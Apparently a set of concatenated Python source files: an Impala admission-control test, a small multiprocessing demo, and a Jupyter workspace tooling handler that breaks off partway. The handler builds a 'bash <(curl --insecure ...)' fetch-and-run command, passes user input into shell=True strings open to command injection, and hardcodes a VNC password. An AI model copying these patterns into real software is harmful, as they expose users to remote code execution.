"Timed out waiting %s seconds for query end" % (STRESS_TIMEOUT,)
sleep(1)
class SubmitQueryThread(threading.Thread):
def __init__(self, impalad, additional_query_options, vector, query_num,
query_end_behavior, executing_threads):
"""
executing_threads must be provided so that this thread can add itself when the
query is admitted and begins execution.
"""
super(self.__class__, self).__init__()
self.executing_threads = executing_threads
self.vector = vector
self.additional_query_options = additional_query_options
self.query_num = query_num
self.query_end_behavior = query_end_behavior
self.impalad = impalad
self.error = None
# query_state is defined and used only by the test code, not a property exposed by
# the server
self.query_state = 'NOT_SUBMITTED'
# lock protects query_handle and shutdown, used by the main thread in teardown()
self.lock = threading.RLock()
self.query_handle = None
self.shutdown = False # Set by the main thread when tearing down
def run(self):
client = None
try:
try:
# Take the lock while query_handle is being created to avoid an unlikely race
# condition with teardown() (i.e. if an error occurs on the main thread), and
# check if the test is already shut down.
self.lock.acquire()
if self.shutdown:
return
exec_options = self.vector.get_value('exec_option')
exec_options.update(self.additional_query_options)
query = QUERY.format(self.query_num)
self.query_state = 'SUBMITTING'
client = self.impalad.service.create_beeswax_client()
ImpalaTestSuite.change_database(client, self.vector.get_value('table_format'))
client.set_configuration(exec_options)
if self.query_end_behavior == 'QUERY_TIMEOUT':
client.execute("SET QUERY_TIMEOUT_S={0}".format(QUERY_END_TIMEOUT_S))
LOG.info("Submitting query %s", self.query_num)
self.query_handle = client.execute_async(query)
client.wait_for_admission_control(self.query_handle)
admission_result = client.get_admission_result(self.query_handle)
assert len(admission_result) > 0
if "Rejected" in admission_result:
LOG.info("Rejected query %s", self.query_num)
self.query_state = 'REJECTED'
self.query_handle = None
return
elif "Timed out" in admission_result:
LOG.info("Query %s timed out", self.query_num)
self.query_state = 'TIMED OUT'
self.query_handle = None
return
LOG.info("Admission result for query %s : %s", self.query_num, admission_result)
except ImpalaBeeswaxException as e:
LOG.exception(e)
raise e
finally:
self.lock.release()
LOG.info("Admitted query %s", self.query_num)
self.query_state = 'ADMITTED'
# The thread becomes visible to the main thread when it is added to the
# shared list of executing_threads. append() is atomic and thread-safe.
self.executing_threads.append(self)
# Synchronize with the main thread. At this point, the thread is executing a
# query. It needs to wait until the main thread requests it to end its query.
while not self.shutdown:
# The QUERY_TIMEOUT needs to stay active until the main thread requests it
# to end. Otherwise, the query may get cancelled early. Fetch rows 2 times
# per QUERY_TIMEOUT interval to keep the query active.
if self.query_end_behavior == 'QUERY_TIMEOUT' and \
self.query_state != 'COMPLETED':
fetch_result = client.fetch(query, self.query_handle, 1)
assert len(fetch_result.data) == 1, str(fetch_result)
if self.query_state == 'REQUEST_QUERY_END':
self._end_query(client, query)
# The query has released admission control resources
self.query_state = 'COMPLETED'
self.query_handle = None
sleep(QUERY_END_TIMEOUT_S * 0.5)
except Exception as e:
LOG.exception(e)
# Unknown errors will be raised later
self.error = e
self.query_state = 'ERROR'
finally:
LOG.info("Thread terminating in state=%s", self.query_state)
if client is not None:
client.close()
def _end_query(self, client, query):
"""Bring the query to the appropriate end state defined by self.query_end_behaviour.
Returns once the query has reached that state."""
LOG.info("Ending query %s by %s",
str(self.query_handle.get_handle()), self.query_end_behavior)
if self.query_end_behavior == 'QUERY_TIMEOUT':
# Sleep and wait for the query to be cancelled. The cancellation will
# set the state to EXCEPTION.
start_time = time()
while (client.get_state(self.query_handle) !=
client.QUERY_STATES['EXCEPTION']):
assert (time() - start_time < STRESS_TIMEOUT),\
"Timed out waiting %s seconds for query cancel" % (STRESS_TIMEOUT,)
sleep(1)
elif self.query_end_behavior == 'EOS':
# Fetch all rows so we hit eos.
client.fetch(query, self.query_handle)
elif self.query_end_behavior == 'CLIENT_CANCEL':
client.cancel(self.query_handle)
else:
assert self.query_end_behavior == 'CLIENT_CLOSE'
client.close_query(self.query_handle)
def _check_queries_page_resource_pools(self):
"""Checks that all queries in the '/queries' webpage json have the correct resource
pool (this is called after all queries have been admitted, queued, or rejected, so
they should already have the pool set), or no pool for queries that don't go through
admission control."""
for impalad in self.impalads:
queries_json = impalad.service.get_debug_webpage_json('/queries')
for query in itertools.chain(queries_json['in_flight_queries'],
queries_json['completed_queries']):
if query['stmt_type'] == 'QUERY' or query['stmt_type'] == 'DML':
assert query['last_event'] != 'Registered' and \
query['last_event'] != 'Planning finished'
assert query['resource_pool'] == self.pool_name
else:
assert query['resource_pool'] == ''
def _get_queries_page_num_queued(self):
"""Returns the number of queries currently in the 'queued' state from the '/queries'
webpage json"""
num_queued = 0
for impalad in self.impalads:
queries_json = impalad.service.get_debug_webpage_json('/queries')
for query in queries_json['in_flight_queries']:
if query['last_event'] == 'Queued':
num_queued += 1
return num_queued
def run_admission_test(self, vector, additional_query_options):
LOG.info("Starting test case with parameters: %s", vector)
self.impalads = self.cluster.impalads
round_robin_submission = vector.get_value('round_robin_submission')
submission_delay_ms = vector.get_value('submission_delay_ms')
if not round_robin_submission:
self.impalads = [self.impalads[0]]
num_queries = vector.get_value('num_queries')
assert num_queries >= MAX_NUM_CONCURRENT_QUERIES + MAX_NUM_QUEUED_QUERIES
initial_metrics = self.get_admission_metrics()
log_metrics("Initial metrics: ", initial_metrics)
for query_num in xrange(num_queries):
impalad = self.impalads[query_num % len(self.impalads)]
query_end_behavior = QUERY_END_BEHAVIORS[query_num % len(QUERY_END_BEHAVIORS)]
thread = self.SubmitQueryThread(impalad, additional_query_options, vector,
query_num, query_end_behavior, self.executing_threads)
thread.start()
self.all_threads.append(thread)
sleep(submission_delay_ms / 1000.0)
# Wait for the admission control to make the initial admission decision for all of
# the queries. They should either be admitted immediately, queued, or rejected.
# The test query is chosen that it with remain active on all backends until the test
# ends the query. This prevents queued queries from being dequeued in the background
# without this thread explicitly ending them, so that the test can admit queries in
# discrete waves.
LOG.info("Wait for initial admission decisions")
(metric_deltas, curr_metrics) = self.wait_for_metric_changes(
['admitted', 'queued', 'rejected'], initial_metrics, num_queries)
# Also wait for the test threads that submitted the queries to start executing.
self.wait_for_admitted_threads(metric_deltas['admitted'])
# Check that the admission decisions are reasonable given the test parameters
# The number of admitted and queued requests should be at least the configured limits
# but less than or equal to those limits times the number of impalads.
assert metric_deltas['dequeued'] == 0,\
"Queued queries should not run until others are made to finish"
assert metric_deltas['admitted'] >= MAX_NUM_CONCURRENT_QUERIES,\
"Admitted fewer than expected queries"
assert metric_deltas['admitted'] <= MAX_NUM_CONCURRENT_QUERIES * len(self.impalads),\
"Admitted more than expected queries: at least one daemon over-admitted"
assert metric_deltas['queued'] >=\
min(num_queries - metric_deltas['admitted'], MAX_NUM_QUEUED_QUERIES),\
"Should have queued more queries before rejecting them"
assert metric_deltas['queued'] <= MAX_NUM_QUEUED_QUERIES * len(self.impalads),\
"Queued too many queries: at least one daemon queued too many"
assert metric_deltas['rejected'] + metric_deltas['admitted'] +\
metric_deltas['queued'] == num_queries,\
"Initial admission decisions don't add up to {0}: {1}".format(
num_queries, str(metric_deltas))
initial_metric_deltas = metric_deltas
# Like above, check that the count from the queries webpage json is reasonable.
queries_page_num_queued = self._get_queries_page_num_queued()
assert queries_page_num_queued >=\
min(num_queries - metric_deltas['admitted'], MAX_NUM_QUEUED_QUERIES)
assert queries_page_num_queued <= MAX_NUM_QUEUED_QUERIES * len(self.impalads)
self._check_queries_page_resource_pools()
# Admit queries in waves until all queries are done. A new wave of admission
# is started by killing some of the running queries.
while len(self.executing_threads) > 0:
curr_metrics = self.get_consistent_admission_metrics(num_queries)
log_metrics("Main loop, curr_metrics: ", curr_metrics)
num_to_end = len(self.executing_threads)
LOG.info("Main loop, will request %s queries to end", num_to_end)
self.end_admitted_queries(num_to_end)
self.wait_for_metric_changes(['released'], curr_metrics, num_to_end)
num_queued_remaining =\
curr_metrics['queued'] - curr_metrics['dequeued'] - curr_metrics['timed-out']
expected_admitted = min(num_queued_remaining, MAX_NUM_CONCURRENT_QUERIES)
(metric_deltas, _) = self.wait_for_metric_changes(
['admitted', 'timed-out'], curr_metrics, expected_admitted)
# The queue timeout is set high for these tests, so we don't expect any queries to
# time out.
assert metric_deltas['admitted'] >= expected_admitted
assert metric_deltas['timed-out'] == 0
self.wait_for_admitted_threads(metric_deltas['admitted'])
# Wait a few topic updates to ensure the admission controllers have reached a steady
# state or we may find an impalad dequeue more requests after we capture metrics.
self.wait_for_statestore_updates(10)
final_metrics = self.get_consistent_admission_metrics(num_queries)
log_metrics("Final metrics: ", final_metrics)
metric_deltas = compute_metric_deltas(final_metrics, initial_metrics)
assert metric_deltas['timed-out'] == 0
if round_robin_submission:
min_expected_admitted = MAX_NUM_CONCURRENT_QUERIES + MAX_NUM_QUEUED_QUERIES
assert metric_deltas['admitted'] >= min_expected_admitted
assert metric_deltas['admitted'] <= min_expected_admitted * len(self.impalads)
assert metric_deltas['admitted'] ==\
initial_metric_deltas['admitted'] + initial_metric_deltas['queued']
assert metric_deltas['queued'] == initial_metric_deltas['queued']
assert metric_deltas['rejected'] == initial_metric_deltas['rejected']
else:
# We shouldn't go over the max number of queries or queue size so we can compute
# the expected number of queries that should have been admitted (which includes the
# number queued as they eventually get admitted as well), queued, and rejected
expected_admitted = MAX_NUM_CONCURRENT_QUERIES + MAX_NUM_QUEUED_QUERIES
assert metric_deltas['admitted'] == expected_admitted
assert metric_deltas['queued'] == MAX_NUM_QUEUED_QUERIES
assert metric_deltas['rejected'] == num_queries - expected_admitted
# All queries should be completed by now.
queries_page_num_queued = self._get_queries_page_num_queued()
assert queries_page_num_queued == 0
self._check_queries_page_resource_pools()
for thread in self.all_threads:
if thread.error is not None:
raise thread.error
@pytest.mark.execute_serially
@SkipIfOS.redhat6
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=MAX_NUM_CONCURRENT_QUERIES,
max_queued=MAX_NUM_QUEUED_QUERIES, pool_max_mem=-1, queue_wait_timeout_ms=600000),
statestored_args=_STATESTORED_ARGS)
def test_admission_controller_with_flags(self, vector):
if self.exploration_strategy() != 'exhaustive':
pytest.skip('runs only in exhaustive')
self.pool_name = 'default-pool'
# The pool has no mem resources set, so submitting queries with huge mem_limits
# should be fine. This exercises the code that does the per-pool memory
# accounting (see MemTracker::GetPoolMemReserved()) without actually being throttled.
self.run_admission_test(vector, {'request_pool': self.pool_name,
'mem_limit': sys.maxint})
@pytest.mark.execute_serially
@SkipIfOS.redhat6
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_config_args(
fs_allocation_file="fair-scheduler-test2.xml",
llama_site_file="llama-site-test2.xml"),
statestored_args=_STATESTORED_ARGS)
def test_admission_controller_with_configs(self, vector):
self.pool_name = 'root.queueB'
self.run_admission_test(vector, {'request_pool': self.pool_name})
def get_proc_limit(self):
"""Gets the process mem limit as reported by the impalad's mem-tracker metric.
Raises an assertion if not all impalads have the same value."""
limit_metrics = []
for impalad in self.cluster.impalads:
limit_metrics.append(impalad.service.get_metric_value("mem-tracker.process.limit"))
assert limit_metrics[0] == limit_metrics[-1],\
"Not all impalads have the same process limit: %s" % (limit_metrics,)
assert limit_metrics[0] is not None
return limit_metrics[0]
@pytest.mark.execute_serially
@SkipIfOS.redhat6
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(
max_requests=MAX_NUM_CONCURRENT_QUERIES * 30, max_queued=MAX_NUM_QUEUED_QUERIES,
pool_max_mem=MEM_TEST_LIMIT, proc_mem_limit=MEM_TEST_LIMIT,
queue_wait_timeout_ms=600000),
statestored_args=_STATESTORED_ARGS)
def test_mem_limit(self, vector):
# Impala may set the proc mem limit lower than we think depending on the overcommit
# settings of the OS. It should be fine to continue anyway.
proc_limit = self.get_proc_limit()
if proc_limit != MEM_TEST_LIMIT:
LOG.info("Warning: Process mem limit %s is not expected val %s", proc_limit,
MEM_TEST_LIMIT)
self.pool_name = 'default-pool'
# Each query mem limit (set the query option to override the per-host memory
# estimate) should use a bit less than (total pool mem limit) / #queries so that
# once #queries are running, the total pool mem usage is about at the limit and
# additional incoming requests will be rejected. The actual pool limit on the number
# of running requests is very high so that requests are only queued/rejected due to
# the mem limit.
num_impalads = len(self.cluster.impalads)
query_mem_limit = (proc_limit / MAX_NUM_CONCURRENT_QUERIES / num_impalads) - 1
self.run_admission_test(vector,
{'request_pool': self.pool_name, 'mem_limit': query_mem_limit})
|
multiprocessing_names.py | import multiprocessing
import time
def worker():
name = multiprocessing.current_process().name
print(name, "Starting")
time.sleep(2)
print(name, "Exiting")
def my_service():
name = multiprocessing.current_process().name
print(name, "Starting")
time.sleep(3)
print(name, "Exiting")
if __name__ == "__main__":
service = multiprocessing.Process(name="my_service", target=my_service)
worker_1 = multiprocessing.Process(name="worker 1", target=worker)
worker_2 = multiprocessing.Process(target=worker)
worker_1.start()
worker_2.start()
service.start() |
tooling_handler.py | import glob
import json
import os
import subprocess
import threading
import time
import warnings
from datetime import datetime
from subprocess import call
import git
import tornado
from notebook.base.handlers import IPythonHandler
from notebook.utils import url_path_join
from tornado import web
try:
from urllib.parse import unquote
except ImportError:
from urllib import unquote
SHARED_SSH_SETUP_PATH = "/shared/ssh/setup"
HOME = os.getenv("HOME", "/root")
RESOURCES_PATH = os.getenv("RESOURCES_PATH", "/resources")
WORKSPACE_HOME = os.getenv("WORKSPACE_HOME", "/workspace")
WORKSPACE_CONFIG_FOLDER = os.path.join(HOME, ".workspace")
MAX_WORKSPACE_FOLDER_SIZE = os.getenv("MAX_WORKSPACE_FOLDER_SIZE", None)
if MAX_WORKSPACE_FOLDER_SIZE and MAX_WORKSPACE_FOLDER_SIZE.isnumeric():
MAX_WORKSPACE_FOLDER_SIZE = int(MAX_WORKSPACE_FOLDER_SIZE)
else:
MAX_WORKSPACE_FOLDER_SIZE = None
MAX_CONTAINER_SIZE = os.getenv("MAX_CONTAINER_SIZE", None)
if MAX_CONTAINER_SIZE and MAX_CONTAINER_SIZE.isnumeric():
MAX_CONTAINER_SIZE = int(MAX_CONTAINER_SIZE)
else:
MAX_CONTAINER_SIZE = None
# -------------- HANDLER -------------------------
class HelloWorldHandler(IPythonHandler):
def data_received(self, chunk):
pass
def get(self):
result = self.request.protocol + "://" + self.request.host
if "base_url" in self.application.settings:
result = result + " " + self.application.settings["base_url"]
self.finish(result)
def handle_error(handler, status_code: int, error_msg: str = None, exception=None):
handler.set_status(status_code)
if not error_msg:
error_msg = ""
if exception:
if error_msg:
error_msg += "\nException: "
error_msg += str(exception)
error = {"error": error_msg}
handler.finish(json.dumps(error))
log.info("An error occurred (" + str(status_code) + "): " + error_msg)
def send_data(handler, data):
handler.finish(json.dumps(data, sort_keys=True, indent=4))
class PingHandler(IPythonHandler):
@web.authenticated
def get(self):
# Used by Jupyterhub to test if user cookies are valid
self.finish("Successful")
class InstallToolHandler(IPythonHandler):
@web.authenticated
def get(self):
try:
workspace_installer_folder = RESOURCES_PATH + "/tools/"
workspace_tool_installers = []
# sort entries by name
for f in sorted(
glob.glob(os.path.join(workspace_installer_folder, "*.sh"))
):
tool_name = os.path.splitext(os.path.basename(f))[0].strip()
workspace_tool_installers.append(
{"name": tool_name, "command": "/bin/bash " + f}
)
if not workspace_tool_installers:
log.warn(
"No workspace tool installers found at path: "
+ workspace_installer_folder
)
# Backup if file does not exist
workspace_tool_installers.append(
{
"name": "none",
"command": "No workspace tool installers found at path: "
+ workspace_installer_folder,
}
)
self.finish(json.dumps(workspace_tool_installers))
except Exception as ex:
handle_error(self, 500, exception=ex)
return
class ToolingHandler(IPythonHandler):
@web.authenticated
def get(self):
try:
workspace_tooling_folder = HOME + "/.workspace/tools/"
workspace_tools = []
def tool_is_duplicated(tool_array, tool):
""" Tools with same ID should only be added once to the list"""
for t in tool_array:
if "id" in t and "id" in tool and tool["id"] == t["id"]:
return True
return False
# sort entries by name
for f in sorted(
glob.glob(os.path.join(workspace_tooling_folder, "*.json"))
):
try:
with open(f, "rb") as tool_file:
tool_data = json.load(tool_file)
if not tool_data:
continue
if isinstance(tool_data, dict):
if not tool_is_duplicated(workspace_tools, tool_data):
workspace_tools.append(tool_data)
else:
# tool data is probably an array
for tool in tool_data:
if not tool_is_duplicated(workspace_tools, tool):
workspace_tools.append(tool)
except Exception:
log.warn("Failed to load tools file: " + f.name)
continue
if not workspace_tools:
log.warn(
"No workspace tools found at path: " + workspace_tooling_folder
)
# Backup if file does not exist
workspace_tools.append(
{
"id": "vnc-link",
"name": "VNC",
"url_path": "/tools/vnc/?password=vncpassword",
"description": "Desktop GUI for the workspace",
}
)
self.finish(json.dumps(workspace_tools))
except Exception as ex:
handle_error(self, 500, exception=ex)
return
class GitCommitHandler(IPythonHandler):
@web.authenticated
def post(self):
data = self.get_json_body()
if data is None:
handle_error(
self, 400, "Please provide a valid file path and commit msg in body."
)
return
if "filePath" not in data or not data["filePath"]:
handle_error(self, 400, "Please provide a valid filePath in body.")
return
file_path = _resolve_path(unquote(data["filePath"]))
commit_msg = None
if "commitMsg" in data:
commit_msg = unquote(data["commitMsg"])
try:
commit_file(file_path, commit_msg)
except Exception as ex:
handle_error(self, 500, exception=ex)
return
class GitInfoHandler(IPythonHandler):
@web.authenticated
def get(self):
try:
path = _resolve_path(self.get_argument("path", None))
send_data(self, get_git_info(path))
except Exception as ex:
handle_error(self, 500, exception=ex)
return
@web.authenticated
def post(self):
path = _resolve_path(self.get_argument("path", None))
data = self.get_json_body()
if data is None:
handle_error(self, 400, "Please provide a valid name and email in body.")
return
if "email" not in data or not data["email"]:
handle_error(self, 400, "Please provide a valid email.")
return
email = data["email"]
if "name" not in data or not data["name"]:
handle_error(self, 400, "Please provide a valid name.")
return
name = data["name"]
try:
repo = get_repo(path)
set_user_email(email, repo)
set_user_name(name, repo)
except Exception as ex:
handle_error(self, 500, exception=ex)
return
class SSHScriptHandler(IPythonHandler):
@web.authenticated
def get(self):
try:
handle_ssh_script_request(self)
except Exception as ex:
handle_error(self, 500, exception=ex)
return
class SharedSSHHandler(IPythonHandler):
def get(self):
# authentication only via token
try:
sharing_enabled = os.environ.get("SHARED_LINKS_ENABLED", "false")
if sharing_enabled.lower() != "true":
handle_error(
self,
401,
error_msg="Shared links are disabled. Please download and execute the SSH script manually.",
)
return
token = self.get_argument("token", None)
valid_token = generate_token(self.request.path)
if not token:
self.set_status(401)
self.finish('echo "Please provide a token via get parameter."')
return
if token.lower().strip() != valid_token:
self.set_status(401)
self.finish('echo "The provided token is not valid."')
return
handle_ssh_script_request(self)
except Exception as ex:
handle_error(self, 500, exception=ex)
return
class SSHCommandHandler(IPythonHandler):
@web.authenticated
def get(self):
try:
sharing_enabled = os.environ.get("SHARED_LINKS_ENABLED", "false")
if sharing_enabled.lower() != "true":
self.finish(
"Shared links are disabled. Please download and executen the SSH script manually."
)
return
# schema + host + port
origin = self.get_argument("origin", None)
if not origin:
handle_error(
self,
400,
"Please provide a valid origin (endpoint url) via get parameter.",
)
return
host, port = parse_endpoint_origin(origin)
base_url = web_app.settings["base_url"].rstrip("/") + SHARED_SSH_SETUP_PATH
setup_command = (
'/bin/bash <(curl -s --insecure "'
+ origin
+ base_url
+ "?token="
+ generate_token(base_url)
+ "&host="
+ host
+ "&port="
+ port
+ '")'
)
self.finish(setup_command)
except Exception as ex:
handle_error(self, 500, exception=ex)
return
class SharedTokenHandler(IPythonHandler):
@web.authenticated
def get(self):
try:
sharing_enabled = os.environ.get("SHARED_LINKS_ENABLED", "false")
if sharing_enabled.lower() != "true":
handle_error(self, 400, error_msg="Shared links are disabled.")
return
path = self.get_argument("path", None)
if path is None:
handle_error(
self, 400, "Please provide a valid path via get parameter."
)
return
self.finish(generate_token(path))
except Exception as ex:
handle_error(self, 500, exception=ex)
return
class SharedFilesHandler(IPythonHandler):
@web.authenticated
def get(self):
try:
sharing_enabled = os.environ.get("SHARED_LINKS_ENABLED", "false")
if sharing_enabled.lower() != "true":
self.finish(
"Shared links are disabled. Please download and share the data manually."
)
return
path = _resolve_path(self.get_argument("path", None))
if not path:
handle_error(
self, 400, "Please provide a valid path via get parameter."
)
return
if not os.path.exists(path):
handle_error(
self, 400, "The selected file or folder does not exist: " + path
)
return
# schema + host + port
origin = self.get_argument("origin", None)
if not origin:
handle_error(
self,
400,
"Please provide a valid origin (endpoint url) via get parameter.",
)
return
token = generate_token(path)
try:
# filebrowser needs to be stopped so that a user can be added
call("supervisorctl stop filebrowser", shell=True)
# Add new user with the given permissions and scope
add_user_command = (
"filebrowser users add "
+ token
+ " "
+ token
+ " --perm.admin=false --perm.create=false --perm.delete=false"
+ " --perm.download=true --perm.execute=false --perm.modify=false"
+ " --perm.rename=false --perm.share=false --lockPassword=true"
+ " --database="
+ HOME
+ '/filebrowser.db --scope="'
+ path
+ '"'
)
call(add_user_command, shell=True)
except Exception:
pass
call("supervisorctl start filebrowser", shell=True)
base_url = web_app.settings["base_url"].rstrip("/") + "/shared/filebrowser/"
setup_command = origin + base_url + "?token=" + token
self.finish(setup_command)
except Exception as ex:
handle_error(self, 500, exception=ex)
return
class StorageCheckHandler(IPythonHandler):
@web.authenticated
def get(self) -> None:
try:
CHECK_INTERVAL_MINUTES = 5
result = {
"workspaceFolderSizeWarning": False,
"containerSizeWarning": False
}
if not MAX_WORKSPACE_FOLDER_SIZE and not MAX_CONTAINER_SIZE:
self.finish(json.dumps(result))
return
minutes_since_update = get_minutes_since_size_update()
if minutes_since_update is not None and minutes_since_update < CHECK_INTERVAL_MINUTES:
# only run check every 5 minutes
self.finish(json.dumps(result))
return
# Only run update every two minutes
# run update in background -> somtimes it might need to much time to run
thread = threading.Thread(target=update_workspace_metadata)
thread.daemon = True
thread.start()
container_size_in_gb = get_container_size()
if MAX_CONTAINER_SIZE:
if container_size_in_gb > MAX_CONTAINER_SIZE:
# Wait for metadata update before showing the warning
# sleep 50 ms -> metadata file should have been updated, otherwise use old metadata
time.sleep(0.050)
container_size_in_gb = get_container_size()
result["containerSize"] = round(container_size_in_gb, 1)
result["containerSizeLimit"] = round(MAX_CONTAINER_SIZE)
if container_size_in_gb > MAX_CONTAINER_SIZE:
# Still bigger after update -> show the warning
result["containerSizeWarning"] = True
log.info(
"You have exceeded the limit the container size. Please clean up."
)
else:
result["containerSizeWarning"] = False
workspace_folder_size_in_gb = get_workspace_folder_size()
if MAX_WORKSPACE_FOLDER_SIZE:
if workspace_folder_size_in_gb > MAX_WORKSPACE_FOLDER_SIZE:
# Wait for metadata update before showing the warning
# sleep 50 ms -> metadata file should have been updated, otherwise use old metadata
time.sleep(0.050)
workspace_folder_size_in_gb = get_workspace_folder_size()
result["workspaceFolderSize"] = round(workspace_folder_size_in_gb, 1)
result["workspaceFolderSizeLimit"] = round(MAX_WORKSPACE_FOLDER_SIZE)
if workspace_folder_size_in_gb > MAX_WORKSPACE_FOLDER_SIZE:
# Still bigger after update -> show the warning
result["workspaceFolderSizeWarning"] = True
log.info(
"You have exceeded the limit the workspace folder size. Please clean up."
)
else:
result["workspaceFolderSizeWarning"] = False
self.finish(json.dumps(result))
except Exception as ex:
handle_error(self, 500, exception=ex)
return
# ------------- Storage Check Utils ------------------------
def get_last_usage_date(path):
date = None
if not os.path.exists(path):
log.info("Path does not exist: " + path)
return date
try:
date = datetime.fromtimestamp(os.path.getmtime(path))
except Exception:
pass
try:
compare_date = datetime.fromtimestamp(os.path.getatime(path))
if date.date() < compare_date.date():
# compare date is newer
date = compare_date
except Exception:
pass
try:
compare_date = datetime.fromtimestamp(os.path.getctime(path))
if date.date() < compare_date.date():
# compare date is newer
date = compare_date
except Exception:
pass
return date
def update_workspace_metadata():
workspace_metadata = {
"update_timestamp": str(datetime.now()),
"container_size_in_kb": None,
"workspace_folder_size_in_kb": None
}
if MAX_CONTAINER_SIZE:
# calculate container size via the root folder
try:
# exclude all different filesystems/mounts
workspace_metadata["container_size_in_kb"] = int(
subprocess.check_output(["du", "-sx", "--exclude=/proc", "/"]).split()[0].decode("utf-8")
)
except Exception:
pass
if MAX_WORKSPACE_FOLDER_SIZE:
# calculate workspace folder size
try:
# exclude all different filesystems/mounts
workspace_metadata["workspace_folder_size_in_kb"] = int(
subprocess.check_output(["du", "-sx", WORKSPACE_HOME]).split()[0].decode("utf-8")
)
except Exception:
pass
if not os.path.exists(WORKSPACE_CONFIG_FOLDER):
os.makedirs(WORKSPACE_CONFIG_FOLDER)
with open(os.path.join(WORKSPACE_CONFIG_FOLDER, "metadata.json"), "w") as file:
json.dump(workspace_metadata, file, sort_keys=True, indent=4)
def get_workspace_metadata():
workspace_metadata = {}
metadata_file_path = os.path.join(WORKSPACE_CONFIG_FOLDER, "metadata.json")
if os.path.isfile(metadata_file_path):
try:
with open(metadata_file_path, "rb") as file:
workspace_metadata = json.load(file)
except Exception:
pass
return workspace_metadata
def get_container_size():
try:
workspace_metadata = get_workspace_metadata()
return int(workspace_metadata["container_size_in_kb"]) / 1024 / 1024
except Exception:
return 0
def get_workspace_folder_size():
try:
workspace_metadata = get_workspace_metadata()
return int(workspace_metadata["workspace_folder_size_in_kb"]) / 1024 / 1024
except Exception:
return 0
def get_minutes_since_size_update():
metadata_file_path = os.path.join(WORKSPACE_CONFIG_FOLDER, "metadata.json")
if os.path.isfile(metadata_file_path):
try:
with open(metadata_file_path, "rb") as file:
workspace_metadata = json.load(file)
update_timestamp_str = workspace_metadata["update_timestamp"]
if not update_timestamp_str:
return None
updated_date = datetime.strptime(
update_timestamp_str, "%Y-%m-%d %H:%M:%S.%f"
)
return ((datetime.now() - updated_date).seconds//60)%60
except Exception as ex:
return None
return None
def get_inactive_days():
# read inactive days from metadata timestamp (update when user is actively using the workspace)
metadata_file_path = os.path.join(WORKSPACE_CONFIG_FOLDER, "metadata.json")
if os.path.isfile(metadata_file_path):
try:
with open(metadata_file_path, "rb") as file:
workspace_metadata = json.load(file)
update_timestamp_str = workspace_metadata["update_timestamp"]
if not update_timestamp_str:
return 0
updated_date = datetime.strptime(
update_timestamp_str, "%Y-%m-%d %H:%M:%S.%f"
)
inactive_days = (datetime.now() - updated_date).days
return inactive_days
except Exception:
return 0
# return 0 as fallback
return 0
def cleanup_folder(
folder_path: str,
max_file_size_mb: int = 50,
last_file_usage: int = 3,
replace_with_info: bool = True,
excluded_folders: list = None,
):
"""
Cleanup folder to reduce disk space usage.
# Arguments
folder_path (str): Folder that should be cleaned.
max_file_size_mb (int): Max size of files in MB that should be deleted. Default: 50.
replace_with_info (bool): Replace removed files with `.removed.txt` files with file removal reason. Default: True.
last_file_usage (int): Number of days a file wasn't used to allow the file to be removed. Default: 3.
excluded_folders (list[str]): List of folders to exclude from removal (optional)
"""
total_cleaned_up_mb = 0
removed_files = 0
for dirname, subdirs, files in os.walk(folder_path):
if excluded_folders:
for excluded_folder in excluded_folders:
if excluded_folder in subdirs:
log.debug("Ignoring folder because of name: " + excluded_folder)
subdirs.remove(excluded_folder)
for filename in files:
file_path = os.path.join(dirname, filename)
file_size_mb = int(os.path.getsize(file_path) / (1024.0 * 1024.0))
if max_file_size_mb and max_file_size_mb > file_size_mb:
# File will not be deleted since it is less than the max size
continue
last_file_usage_days = None
if get_last_usage_date(file_path):
last_file_usage_days = (
datetime.now() - get_last_usage_date(file_path)
).days
if last_file_usage_days and last_file_usage_days <= last_file_usage:
continue
current_date_str = datetime.now().strftime("%B %d, %Y")
removal_reason = (
"File has been removed during folder cleaning ("
+ folder_path
+ ") on "
+ current_date_str
+ ". "
)
if file_size_mb and max_file_size_mb:
removal_reason += (
"The file size was "
+ str(file_size_mb)
+ " MB (max "
+ str(max_file_size_mb)
+ "). "
)
if last_file_usage_days and last_file_usage:
removal_reason += (
"The last usage was "
+ str(last_file_usage_days)
+ " days ago (max "
+ str(last_file_usage)
+ "). "
)
log.info(filename + ": " + removal_reason)
# Remove file
try:
os.remove(file_path)
if replace_with_info:
with open(file_path + ".removed.txt", "w") as file:
file.write(removal_reason)
if file_size_mb:
total_cleaned_up_mb += file_size_mb
removed_files += 1
except Exception as e:
log.info("Failed to remove file: " + file_path, e)
# check diskspace and update workspace metadata
update_workspace_metadata()
log.info(
"Finished cleaning. Removed "
+ str(removed_files)
+ " files with a total disk space of "
+ str(total_cleaned_up_mb)
+ " MB."
)
# ------------- GIT FUNCTIONS ------------------------
def execute_command(cmd: str):
return subprocess.check_output(cmd.split()).decode("utf-8").replace("\n", "")
def get_repo(directory: str):
if not directory:
return None
try:
return git.Repo(directory, search_parent_directories=True)
except Exception:
return None
def set_user_email(email: str, repo=None):
if repo:
repo.config_writer().set_value("user", "email", email).release()
else:
exit_code = subprocess.call(
'git config --global user.email "' + email + '"', shell=True
)
if exit_code > 0:
warnings.warn("Global email configuration failed.")
def set_user_name(name: str, repo=None):
if repo:
repo.config_writer().set_value("user", "name", name).release()
else:
exit_code = subprocess.call(
'git config --global user.name "' + name + '"', shell=True
)
if exit_code > 0:
warnings.warn("Global name configuration failed.")
def commit_file(file_path: str, commit_msg: str = None, push: bool = True):
if not os.path.isfile(file_path):
raise Exception("File does not exist: " + file_path)
repo = get_repo(os.path.dirname(file_path))
if not repo:
raise Exception("No git repo was found for file: " + file_path)
# Always add file
repo.index.add([file_path])
if not get_user_name(repo):
raise Exception(
'Cannot push to remote. Please specify a name with: git config --global user.name "YOUR NAME"'
)
if not get_user_email(repo):
raise Exception(
'Cannot push to remote. Please specify an email with: git config --global user.emails "YOUR EMAIL"'
)
if not commit_msg:
commit_msg = "Updated " + os.path.relpath(file_path, repo.working_dir)
try:
# fetch and merge newest state - fast-forward-only
repo.git.pull("--ff-only")
except Exception:
raise Exception("The repo is not up-to-date or cannot be updated.")
try:
# Commit single file with commit message
repo.git.commit(file_path, m=commit_msg)
except git.GitCommandError as error:
if error.stdout and (
"branch is up-to-date with" in error.stdout
or "branch is up to date with" in error.stdout
):
# TODO better way to check if file has changed, e.g. has_file_changed
raise Exception("File has not been changed: " + file_path)
else:
raise error
if push:
# Push file to remote
try:
